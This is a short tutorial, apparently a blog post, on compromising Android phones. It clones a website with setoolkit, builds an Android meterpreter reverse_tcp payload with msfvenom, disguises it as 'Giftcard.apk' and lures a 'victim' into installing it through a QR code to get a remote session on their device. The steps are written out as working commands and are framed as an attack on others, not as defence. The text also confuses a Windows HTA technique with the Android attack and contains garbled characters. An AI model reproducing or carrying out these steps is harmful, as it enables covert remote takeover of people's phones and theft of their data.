Hack Android Phone With QR Code – Hello guy’s in this article I’m going to teach you How hackers hack the android phone by using the QRcode and HTAย techniques
What is HTA Attack?
The HTA Attack method will allow us to clone a site and perform PowerShell injection through HTA files which can be used for Windows-based PowerShell exploitation through the browser. It is a simple HTML application that can provide full access to the remote attacker. The usual file extension of an HTA is (.hta).
Hack android Phone with QR code?
Step 1:
First of all, we need to install the apache server so type the below command in your terminal
sudo apt install apache2
Step 2:
Then open the setoolkit tool, after opening the tool press 1 to run the tool
setoolkit
Step 3:
Now pressย 2ย and select the second option โWebsite Attack Vectorsโ.
Step 4:
Now choose the 7th option “HTA attack”
Step 5:
Now here we get three options where thanks to the first option we can only choose the default template, the second option allows us to clone any web application and we can import our custom web template by selecting the third option. In our case, we will choose the second option to clone the web application.
Step 6:
Now we enter the URL we want to clone and then we enter the localhost address as well as the port number.
Simultaneously open a new terminal, navigate to the main folder of the Apache web server and activate the payload using the given command. After creating the payload, open the “index.html” file using the nano command.
cd /var/www/html/
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 R > Giftcard.apk
ls -l
nano index.html
Now we need to change the source name โLauncher .htaโ to โGiftcard.apkโ by which name we first created a payload.
Step 7:
Now Download the Chrome Browserย QR codeย Extension so click the below download button
All you have to do is open the IP address of your Apacheย web serverย anywhere, click on the extension and you will get theย QR codeย which you can share with the victim.
Once the victim scan the QRcode means the payload will be popup on theย androidย device
After Install the payload you will get the meterpreter session of his Device
